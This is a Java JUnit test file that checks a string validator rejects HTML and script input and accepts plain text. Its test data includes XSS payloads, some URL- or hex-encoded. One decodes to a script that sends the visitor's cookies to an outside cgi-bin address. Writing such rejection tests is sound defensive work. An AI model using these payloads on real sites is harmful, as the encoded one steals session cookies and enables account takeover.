package no.fjas.wspv.validators;

import junit.framework.TestCase;
import no.fjas.wspv.ValidationException;
import no.fjas.wspv.validators.StringLengthValidator;

import org.w3c.dom.Document;
import org.w3c.dom.Element;

public class StringValidatorTest extends TestCase {

	StringLengthValidator validator = null;
	Element mockupElement = null;
	
	public void setUp() {
		Document doc = new org.apache.xerces.dom.CoreDocumentImpl();
		mockupElement = doc.createElement("test");

		validator = new StringLengthValidator();
	}
	
	public void testPlainText() {
		try {
			mockupElement.setTextContent("The quick brown fox jumps over the lazy dog.");
			validator.validate(mockupElement);					
			assertTrue(true);
		} catch (ValidationException e) {
			fail();
		}
	}
	
	public void testStringWithRegularHtml() {
		try {
			mockupElement.setTextContent("The quick <b>brown</b> fox jumps over the lazy dog.");
			validator.validate(mockupElement);					
			fail();
		} catch (ValidationException e) {
			assertTrue(true);
		}
	}
	
	public void testStringWithScriptHtml() {
		try {
			mockupElement.setTextContent("The quick <script>alert('OK')</script> brown< fox jumps over the lazy dog.");
			validator.validate(mockupElement);					
			fail();
		} catch (ValidationException e) {
			assertTrue(true);
		}
	}
	
	public void testStringWithHexTag() {
		try {
			mockupElement.setTextContent("The quick %3C%73%63%72%69%70%74%3Ealert('OK')%3C%2F%73%63%72%69%70%74%3E brown< fox jumps over the lazy dog.");
			validator.validate(mockupElement);					
			fail();
		} catch (ValidationException e) {
			assertTrue(true);
		}
	}
	
	public void testStringWithPercentSign() {
		try {
			mockupElement.setTextContent("The quick brown fox jumps 100% over the lazy dog.");
			validator.validate(mockupElement);					
			assertTrue(true);
		} catch (ValidationException e) {
			fail();
		}
	}
	
	public void testMassivHex() {
		try {
			mockupElement.setTextContent("%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e");
			validator.validate(mockupElement);
			fail();
		} catch(ValidationException e) {
			assertTrue(true);
		}
	}
}
